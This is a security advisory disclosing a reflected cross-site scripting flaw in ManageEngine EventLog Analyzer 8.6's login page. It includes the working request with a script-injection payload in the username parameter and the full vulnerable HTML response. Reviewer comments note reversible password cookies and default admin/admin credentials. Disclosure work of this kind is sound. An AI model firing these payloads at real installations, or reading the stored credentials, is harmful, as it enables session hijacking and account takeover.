ManageEngine EventLog Analyzer 8.6 Cross Site Scripting

2014-01-17T00:00:00
ID PACKETSTORM:124821
Type packetstorm
Reporter Asheesh Kumar Mani Tripathi
Modified 2014-01-17T00:00:00

Description

                                        
                                            `================================================================================================================================================================  
  
ManageEngine EventLog Analyzer 8.6 cross-site scripting (XSS) Vulnerability  
================================================================================================================================================================  
  
  
#Date- 12/12/2013  
  
# code by Asheesh kumar Mani Tripathi  
  
  
  
# Credit by Asheesh Anaconda  
  
  
  
#Vulnerability
ManageEngine EventLog Analyzer 8.6 is prone to a reflected cross-site scripting (XSS) vulnerability because the login handler (/event/j_security_check) echoes the
j_username parameter back into the value attribute of the hidden "forChecking" input on the login page without HTML-encoding it. A double quote and angle brackets in the username therefore close the attribute and the tag, and the remainder is parsed as markup.
  
#Impact
A successful exploit runs attacker-supplied script in the victim's browser within the origin of the EventLog Analyzer web console. The payload travels in a GET request to the login page (the response is the login form itself, so no session is needed), which makes it deliverable as a link. Script running in this origin can read document.cookie - where this very page stores the "Keep me signed in" username and a trivially obfuscated password (see check() and decryptPassword() in the response below) - and can submit the login form or other requests as the victim.
  
  
========================================================================================================================  
  
Request (the payload `"><script>alert(1)</script>` is carried in the j_username query parameter; the remaining parameters are the ordinary login-form fields)
========================================================================================================================  
  
  
GET /event/j_security_check?forChecking=null&j_username=aad307"><script>alert(1)</script>509283f38eba1c193&j_password=a&domains=Choose&loginButton=Login&optionValue=hide HTTP/1.1  
Host: 172.28.154.78:8400  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Referer: http://172.28.154.78:8400/event/index3.do  
Cookie: panelState=expanded; calselection=custom; tooltipDiv=block; JSESSIONID=946D162CF15C188883BA1750E38F7A7B  
Connection: keep-alive  
  
  
========================================================================================================================  
  
Response (HTTP 200, text/html; the username is reflected unencoded inside the value attribute of the hidden forChecking input, where the `">` terminates the attribute and tag and the `<script>` block is parsed as markup)
========================================================================================================================  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
isLoginPage: true  
Content-Type: text/html;charset=UTF-8  
Vary: Accept-Encoding  
Date: Tue, 17 Dec 2013 19:36:08 GMT  
Content-Length: 17880  
  
  
  
<link href="styles/newTheme.css" rel="stylesheet" type="text/css" />  
<!-- link href="styles/calendar.css" rel="stylesheet" type="text/css"-->  
<script type="text/javascript" language="JavaScript" src="javascript/sacommon.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/jquery-1.3.2.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/jquery-utils.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/jquery.cookie.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/jquery-ui.js" ></script>  
<script type="text/javascript" language="JavaScript" src="javascript/elascript.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/setLayerPosition.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/LAUtils.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/json2.js"></script>  
<script type="text/javascript" language="JavaScript" src="javascript/jstorage.js"></script>  
  
  
  
  
  
<!DOCTYPE html>   
<html>  
<head>  
  
<title>ManageEngine EventLog Analyzer 8</title>  
<LINK REL="SHORTCUT ICON" HREF="images/favicon.ico">  
<script>  
  
  
// Shows the domain selector when AD authentication is enabled, otherwise
// disables the hidden "domain" field so it is not submitted.
// Called from <body onload> with the server-rendered string 'true'/'false'
// (this capture passes 'false').
function userType(ADAuthEnabled)
{
if(ADAuthEnabled == 'true')
{
//document.getElementById('loginOption').style.display='';
document.getElementById('domainLists').style.visibility="visible";
document.getElementById('selectdomiain').style.visibility="visible";
} else {
document.loginForm.domain.disabled=true;
}
//loadLogin();
var id = document.getElementById("loginFirst");


// NOTE(review): eval() of a constant string; a plain assignment would do and
// would not require 'unsafe-eval' under a CSP.
eval("id.style.visibility = 'visible';");


}
  
// Single shared XMLHttpRequest; clearLoginInfo() and dynamicDomains() each
// overwrite it, so a second request in flight replaces the first one's handler.
var xmlHttp;
  
// Dismisses the "first time users use admin/admin" hint: fires an async GET to
// login.do?requestid=false and lets processReqChange() hide the #loginFirst box.
function clearLoginInfo()
{
xmlHttp=GetXmlHttpObject()
if (xmlHttp==null)
{
alert ("Browser does not support HTTP Request")
return
}
var url="login.do?requestid=false"//No I18N
// sid is a random value appended to the query; presumably a cache buster.
url=url+"&sid="+Math.random()//No I18N
xmlHttp.onreadystatechange=processReqChange
xmlHttp.open("GET",url,true)
xmlHttp.send(null)
}
  
// readystatechange handler for clearLoginInfo(): on a 200 reply hides the
// #loginFirst hint; any other status is reported via alert(). The response
// body is read into `value` but never used.
function processReqChange()
{
// only if xmlHttp shows "complete"
if (xmlHttp.readyState == 4)
{
// only if "OK"
if (xmlHttp.status == 200)
{
var value = xmlHttp.responseText;
var id = document.getElementById("loginFirst");
// NOTE(review): eval() of a constant string; equivalent to a direct assignment.
eval("id.style.visibility = 'hidden';");
}
else
{
alert("There was a problem retrieving the data:\n" + xmlHttp.statusText);//No I18N
}
}
}
  
// readystatechange handler for dynamicDomains(): on a 200 reply hands the raw
// response text to populatedomains(), which treats it as a comma-separated
// list of domain names.
function dynamicprocessReqChange()
{
// only if xmlHttp shows "complete"
if (xmlHttp.readyState == 4)
{
// only if "OK"
if (xmlHttp.status == 200)
{
var value = xmlHttp.responseText;
if(value != null){
populatedomains(value);

}
}
else
{
alert("There was a problem retrieving the data:\n" + xmlHttp.statusText);//No I18N
}
}
}
  
// Replaces the <select name="domains"> options with one entry per
// comma-separated item in domainslist (text and value both set to the item),
// then re-runs authenticationType() so the hidden auth fields match the new
// selection. The Option constructor assigns text, not HTML, so server data
// reaching this point is not rendered as markup.
function populatedomains(domainslist)
{
var domainsforthisuser = domainslist.split(",");
var numberofdomains = domainsforthisuser.length;
document.loginForm.domains.options.length = 0;
for(var i=0;i<numberofdomains;i++)
{
document.forms["loginForm"].domains.options[i] =new Option(domainsforthisuser[i],domainsforthisuser[i]);
}
authenticationType();
}
  
  
// Returns a fresh XHR object: the native XMLHttpRequest where available,
// otherwise the legacy IE ActiveX control; null when the browser offers neither.
function GetXmlHttpObject()
{
var request = null;
if (window.XMLHttpRequest) {
// Mozilla / Firefox / modern browsers
request = new XMLHttpRequest();
} else if (window.ActiveXObject) {
// old Internet Explorer
request = new ActiveXObject("Microsoft.XMLHTTP");
}
return request;
}
  
// onchange handler of the username field (fires before any authentication):
// asks /domainAuth for the domains associated with the typed username and
// lets dynamicprocessReqChange() fill the domain <select>.
function dynamicDomains(usernameObject )
{
var username = usernameObject.value;
xmlHttp=GetXmlHttpObject()
if (xmlHttp==null)
{
alert ("Browser does not support HTTP Request")
return
}
// NOTE(review): username is concatenated into the query string without
// encodeURIComponent(), so '&', '#' or '%' in it alter the request; and the
// endpoint is reachable from the unauthenticated login page - worth checking
// what it discloses for arbitrary usernames.
var url="/domainAuth?username="+username//No I18N
xmlHttp.onreadystatechange=dynamicprocessReqChange
xmlHttp.open("GET",url,true)
xmlHttp.send(null);
}
  
// Runs at the end of the form: implements "Keep me signed in" on the client.
// Reads the `username`, `password` and `singlesignon` values out of
// document.cookie by substring search, de-obfuscates the password with
// decryptPassword(), pre-fills the form and - when singlesignon is "true" and
// the server did not flag the last attempt as invalid - submits it automatically.
// NOTE(review): credentials therefore live in script-readable cookies set by
// check(); any script running in this origin (e.g. the reflected XSS in
// forChecking) can read them.
function loadLogin()
{
//alert("loadLogin()")
document.loginForm.j_username.value="";
//document.login.j_username.focus();
init = (document.cookie).indexOf("username");
if(init != -1 )
{
//alert("inside getCookie.init");
userlen = "username".length; //No I18N
beginIndex = ((document.cookie).indexOf("username")+userlen);
endIndex = (document.cookie).indexOf(";",beginIndex);
if(endIndex == -1)
{
endIndex = (document.cookie).length;
}
// +1 skips the '=' after the cookie name.
username=(document.cookie).substring(beginIndex+1,endIndex);
//alert("user:"+username);

// NOTE(review): indexOf("password") matches the first occurrence anywhere in
// the cookie string, and returns -1 (start offset 7) when no such cookie
// exists - the parse is positional, not a real cookie-jar lookup.
startIndex = ((document.cookie).indexOf("password")+"password".length);//No I18N
endInd = (document.cookie).indexOf(";",startIndex);
if(endInd == -1)
{
endInd=(document.cookie).length;
}
//Decrypting encrypted password..
var encPassword=(document.cookie).substring(startIndex+1,endInd);
password = decryptPassword(encPassword);
//alert(password);

var ssoStart = ((document.cookie).indexOf("singlesignon")+"singlesignon".length);//No I18N
var ssoEnd = (document.cookie).indexOf(";",ssoStart);
if(ssoEnd == -1)
{
ssoEnd=(document.cookie).length;
}
var singlesignon = (document.cookie).substring(ssoStart+1,ssoEnd);
//alert(singlesignon);

document.loginForm.j_username.value=username;
document.loginForm.j_password.value=password;
document.loginForm.checkbox.checked=false;

//alert(username + password+singlesignon);
if(singlesignon=="true" && username!="" && password!="")
{
//alert('1');
document.loginForm.checkbox.checked=true;
//debugger;
// forChecking is server-rendered (and, in this capture, the XSS sink); the
// auto-submit is skipped only when it carries the exact invalid-login text.
if(document.loginForm.forChecking.value!="Invalid loginName/password")
{
document.loginForm.forChecking.value="";
// Server-templated condition; rendered as a constant true here.
if ("null" == 'null')
{
document.loginForm.submit();
}
}
else
{
document.loginForm.j_username.value="";
document.loginForm.j_password.value="";
document.loginForm.checkbox.checked=false;
document.loginForm.j_username.focus();
}
}

}
else
{
//alert('0');
document.loginForm.j_username.focus();
}
}
  
// Obfuscates (it does NOT encrypt) a password for the "Keep me signed in"
// cookie: URL-escapes the text, then emits (charCode - 23) of every character
// as decimal digits. escape() leaves only [A-Za-z0-9@*_+-./%], so each shifted
// code is exactly two digits and decryptPassword() can read the string in pairs.
// NOTE(review): fixed unkeyed shift - anyone holding the cookie recovers the
// plaintext with decryptPassword().
function encryptPassword(textPassword)
{
var escaped = escape(textPassword);
var digits = "";
var pos = 0;
while (pos < escaped.length) {
// number -> string concatenation, same as the original `+=`
digits = digits + (escaped.charCodeAt(pos) - 23);
pos++;
}
return digits;
}
  
// Inverse of encryptPassword(): consumes two decimal digits at a time, adds
// the shift back, rebuilds each character as a %XX escape, then unescapes the
// whole string once more to undo the escape() applied at encryption time.
// Odd-length or non-numeric input produces "%NaN"-style garbage rather than
// an error, exactly as the original did.
function decryptPassword(encPassword)
{
var source = encPassword;
var chars = [];
for (var cursor = 0; cursor < source.length; cursor += 2) {
var code = parseInt(source.substr(cursor, 2)) + 23;
chars.push(unescape('%' + code.toString(16)));
}
return unescape(chars.join(""));
}
// Keeps the hidden AUTHRULE_NAME / domainName / domain fields in step with the
// selected entry of the domains <select>. Called on select change, on the Login
// button click and after populatedomains().
// NOTE(review): the authenticator name submitted to j_security_check is chosen
// client-side here ('ADAuthenticator' / 'RadiusAuthenticator', or the default
// 'Authenticator' from the hidden input) - whether the server trusts this
// value is worth confirming.
function authenticationType()
{
var seldomain = document.loginForm.domains.value;

if(seldomain.trim() == 'Local Authentication' || seldomain.trim() == 'Choose')
{

// 'Choose' with the domain list visible is treated as an AD login.
if(seldomain.trim() == 'Choose' && jQuery('#domainLists').css('visibility') == 'visible'){

document.loginForm.AUTHRULE_NAME.value='ADAuthenticator'; //No I18N

document.loginForm.domainName.disabled=false;

document.loginForm.domainName.value=seldomain;

document.loginForm.domain.disabled=false;

document.loginForm.domain.value=seldomain;
}
else
{

// Local login: disabled controls are not submitted with the form.
document.loginForm.domain.disabled=true;
document.loginForm.AUTHRULE_NAME.disabled=true; //No I18N
document.loginForm.domainName.disabled=true;
}
}
else if(seldomain=='radius')
{
document.loginForm.AUTHRULE_NAME.value='RadiusAuthenticator'; //No I18N
document.loginForm.domain.disabled=false;
document.loginForm.domain.value=seldomain;
}
else
{
// Any other value is taken to be an AD domain name.
document.loginForm.AUTHRULE_NAME.value='ADAuthenticator'; //No I18N
document.loginForm.domainName.disabled=false;
document.loginForm.domainName.value=seldomain;
document.loginForm.domain.disabled=false;
document.loginForm.domain.value=seldomain;
}


}
// Toggles the domain selector and flips the hidden optionValue field between
// 'show' and 'hide' so the state survives the form round-trip. Not referenced
// by any visible markup in this capture (the anchor that called it is
// commented out).
function loginOptions()
{
var optionValue = document.loginForm.optionValue.value;

if(optionValue == 'show')
{
document.getElementById('domainLists').style.visibility='visible';
document.getElementById('selectdomiain').style.visibility='visible';
//document.getElementById('loginOption').innerHTML="<a title='Hide' href='javascript:loginOptions()'>Options <<</a>";
document.loginForm.optionValue.value='hide';//No I18N
}
else
{
document.getElementById('domainLists').style.visibility='hidden';
document.getElementById('selectdomiain').style.visibility='hidden';
//document.getElementById('loginOption').innerHTML="<a title='Show' href='javascript:loginOptions()'>Options >></a>";
document.loginForm.optionValue.value='show';//No I18N
}
}
  
// Placeholder emulation for Internet Explorer only (detected via the
// deprecated jQuery.browser.msie UA sniff): shows the fake "User Name" /
// "Password" labels and hides them on focus/click/keypress, restoring them on
// blur when the field is empty. Other browsers rely on the native placeholder
// attribute.
jQuery(document).ready(function() {

var isIE = jQuery.browser.msie;
if(isIE)
{
jQuery('.placeholderUsername').show();
jQuery('.placeholderPassword').show();

jQuery('#username').keypress(function(){
if(jQuery(this).val() == '' || jQuery(this).val() == 'Password')
{
jQuery('.placeholderPassword').hide();
jQuery('.placeholderUsername').hide();

}
});
jQuery('#username').click(function(){
jQuery('.placeholderUsername').hide();
jQuery('.placeholderPassword').hide();
});
jQuery('#username').focus(function(){
jQuery('.placeholderUsername').hide();
});
jQuery('#password').focus(function(){
jQuery('.placeholderPassword').hide();
});
jQuery('.placeholderUsername').click(function(){
jQuery(this).hide();
jQuery('#username').focus();
});
jQuery('.placeholderPassword').click(function(){
jQuery(this).hide();
jQuery('#password').focus();
});
jQuery('#username').blur(function(){
if(jQuery(this).val() == '')
{
jQuery('.placeholderUsername').show();
}
if(jQuery('#password').val() == '')
{
jQuery('.placeholderPassword').show();
}
else
{
jQuery('.placeholderPassword').hide();
}
});
jQuery('#password').blur(function(){
if(jQuery(this).val() == '')
{
jQuery('.placeholderPassword').show();
}
if(jQuery('#username').val() == '')
{
jQuery('.placeholderUsername').show();
}

});
}

});
  
  
</script>  
</head>  
  
  
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onload="userType('false');" style="background-color:#FFF" scroll="yes" >  
<script language="JavaScript" type="text/JavaScript">  
// onSubmit handler of loginForm. Rejects empty/placeholder username or
// password (returns false, which blocks submission), lower-cases the
// username, then writes the credential cookies consumed by loadLogin().
// The success path returns undefined, which does not block the submit.
// NOTE(review): all cookies are written via document.cookie with no Secure,
// HttpOnly or Path attribute, so they are readable by any script in this
// origin.
function check()
{
x = document.loginForm
if (x.j_username.value == "" || x.j_username.value =="User Name")
{
document.getElementById('message').innerHTML ='Please enter a User Name';
return false;
}

if ( x.j_password.value == "" || x.j_password.value =="Password")
{
document.getElementById('message').innerHTML ='Please enter password';
return false;
}
//Convert the username to lowercase to overcome the login issue in mickey
x.j_username.value=x.j_username.value.toLowerCase();


// this is for 'Keep me signed on'
var expDate = new Date();
var thisCookie;
if(x.checkbox.checked)
{
// "Keep me signed in": one-year cookies holding the username, the
// encryptPassword()-obfuscated password and singlesignon=true.
expDate.setTime(expDate.getTime()+(24*60*60*1000*365));
document.cookie="username= "+x.j_username.value+";expires= "+((expDate).toGMTString());
//Encrypting the password for Cookie
var textPassword = x.j_password.value ;
var encPassword = encryptPassword(textPassword);
document.cookie="password= "+ encPassword +";expires= "+((expDate).toGMTString());
var sso = "true";
document.cookie="singlesignon= "+ sso +";expires= "+((expDate).toGMTString());
//alert("cookie:"+document.cookie);
//console.debug("cockie="+document.cookie);
}
else
{
// Not remembered: the same three cookies with expires = now, i.e. intended
// to clear them. NOTE(review): the password is written here in PLAIN TEXT
// (no encryptPassword()), relying solely on the immediate expiry.
expDate.setTime(expDate.getTime());
document.cookie="username= "+x.j_username.value+";expires= "+((expDate).toGMTString());
document.cookie="password= "+x.j_password.value+";expires= "+((expDate).toGMTString());
document.cookie="singlesignon= 'false';expires= "+((expDate).toGMTString());
//alert("else cookie:"+document.cookie);

}

}
  
  
  
  
  
</script>  
<form name="loginForm" action="j_security_check" method="post" onSubmit="return check()" >  
  
<input type="hidden" name="AUTHRULE_NAME" value="Authenticator">  
  
<input type="hidden" name="domainName" disabled value="Local">  
  
<div id="loginmain">  
  
<div id="login">  
<div class="loginmessage">  
<h1>Sign In here</h1>  
<div id="message" class="error2"></div>  
  
  
<!-- XSS sink: the submitted j_username is embedded in this value attribute
     without HTML-encoding. The `">` in the payload closes the attribute and
     the <input> tag, so the following <script>alert(1)</script> is parsed as
     live markup. The fix is attribute-context encoding of the username
     (at minimum & " < >) before it is written into the template. -->
<input type="hidden" name="forChecking" value="No such account configured for the user [aad307"><script>alert(1)</script>509283f38eba1c193]">

<SCRIPT LANGUAGE="javascript" type="text/javascript">
// Server-rendered error banner for the failed login attempt.
document.getElementById('message').innerHTML ='Invalid loginname / password';

</SCRIPT>
  
  
  
  
</div>   
<div class="loginbox">  
<div class="login_input1"> <span class="usericon"> </span>  
<div class="placeholderUsername">User Name</div>  
<input type="text" tabindex="10" name="j_username" id="username" onchange='dynamicDomains(this)' class="txtbox2" placeholder="User Name" />  
  
</div>  
<div class="login_input"> <span class="passicon"> </span>  
<div class="placeholderPassword">Password</div>  
<input type="password" tabindex="20" name="j_password" id="password" class="txtbox2" placeholder="Password" />  
  
  
</div>  
</div>   
  
<div id="selectdomiain" style="visibility:hidden">   
<div id="domainLists" style="visibility:hidden">   
  
<select name="domains" onChange='authenticationType()'>  
<option value="Choose">-- Choose --</option>  
  
<option value="Local Authentication">Local Authentication</option>  
</select>  
<input name="domain" type="hidden" value="">  
</div></div>  
  
<div class="btn">  
  
<div class="remember">  
<input type="checkbox" name="checkbox" id="checkbox" />  
<label class="txt">Keep me signed in</label>  
</div>  
<div class="login_bnt">   
<input name="loginButton" type="submit" style="width:80" class="loginbtn" value="Login" onclick="authenticationType()">  
<input name="optionValue" type="hidden" value="hide">  
</div>  
</div>  
<!-- NOTE(review): the default credentials (admin/admin) are printed on the
     unauthenticated login page; the hint is only hidden client-side after
     clearLoginInfo() succeeds. -->
<div id="loginFirst" class="alignC" style="top:300px; position:absolute;width:400px;">
<span id="firstTimeInfo" class="firstTimeMgs">First time users use '<b>admin</b>' / '<b>admin</b>' to login   <a title="Do not show login details again" onclick="clearLoginInfo()" href="javascript:void(0);">X</a> </span>
</div>
</div>   
  
<div id="login_log">  
<div id="logobg">  
<div id="logo"><img src="images/eventlog_login_logo.png" alt="EventLog Analyzer" /></div>  
<div class="loginCaption">Unlock the Real Value of your Machine Generated Logs</div>  
</div>  
</div>  
  
</div>  
<div id="copyright">The <a href="http://www.eventloganalyzer.com" target="_blank">SIEM software</a> from <a href="http://www.manageengine.com" target="_blank" title="www.manageengine.com">ManageEngine </a> © 2013 <a href="http://www.manageengine.com" target="_blank" title="www.manageengine.com">ZOHO Corp.</a> All Rights Reserved </div>  
  
  
  
  
  
  
  
<script>
// Runs after the form exists: restores remembered credentials from cookies
// and may auto-submit the form (see loadLogin()).
loadLogin();
</script>
  
  
</form>  
  
<map name="Map">  
<area shape="rect" coords="2,2,141,37" href="http://www.netflowanalyzer.com" target="_blank" title="http://www.netflowanalyzer.com">  
<area shape="rect" coords="149,3,289,38" href="http://www.desktopcentral.com" target="_blank" title="http://www.desktopcentral.com">  
<area shape="rect" coords="296,3,437,38" href="http://www.fwanalyzer.com" target="_blank" title="http://www.fwanalyzer.com">  
<area shape="rect" coords="442,2,582,36" href="http://www.opmanager.com" target="_blank" title="http://www.opmanager.com">  
<area shape="rect" coords="589,2,736,36" href="http://www.wifimanager.com" target="_blank" title="http://www.wifimanager.com">  
<area shape="rect" coords="460,42,515,54" href="https://store.manageengine.com" target="_blank" title="https://store.manageengine.com">  
</map>  
</body>  
  
</html>  
  
  
<script language="JavaScript">  
// Extracts the major version from an "MSIE n." user-agent token. Browsers
// without that token (or with it at offset 0) are reported as 6 so the
// version gate that follows treats them as supported.
function getieversion()
{
var agent = window.navigator.userAgent;
var token = "MSIE ";
var at = agent.indexOf(token);
if (at <= 0) {
return 6; //tmp kludge to resolve other browsers
}
var dot = agent.indexOf(".", at);
return parseInt(agent.substring(at + token.length, dot));
}
</script>  
  
<script>  
  
// Disable the form on IE 5 and older.
if(getieversion()<=5 )
{
document.loginForm.j_username.disabled = true;
document.loginForm.j_password.disabled = true;
document.loginForm.loginButton.disabled = true;

document.loginForm.j_username.className = "txtboxDisabled";
document.loginForm.j_password.className = "txtboxDisabled";
document.loginForm.loginButton.className= "txtboxDisabled";
alert("Sorry, we do not Support your Internet Explorer version "+getieversion()+" !!!");//No I18N
}

var AcceptsCookiesCheck = false;

// Cookie-support probe. NOTE(review): eval("document.cookie") is only truthy
// when the cookie string is non-empty, and the inner branch requires it to be
// empty, so the probe never runs and AcceptsCookiesCheck stays false.
if(eval("document.cookie"))
{
if(document.cookie == '')
{
document.cookie = 'AcceptsCookiesCheck=yes';
if(document.cookie.indexOf('AcceptsCookiesCheck=yes') != -1)
{
AcceptsCookiesCheck = true;
}
else
{
alert("Web Browser should have both Javascript and Cookies enabled!");
}
}
}
// UI-state cookies (these are the ones visible in the captured request).
jQuery.cookie("panelState","expanded");//No I18N
jQuery.cookie("calselection","custom");//No I18N
jQuery.cookie("tooltipDiv","block");//No I18N
//added for search - Pravin
jQuery(document).ready(function()
{
//this will remove all the keys which were saved by storage ...
jQuery.jStorage.flush();
});
</script>  
  
`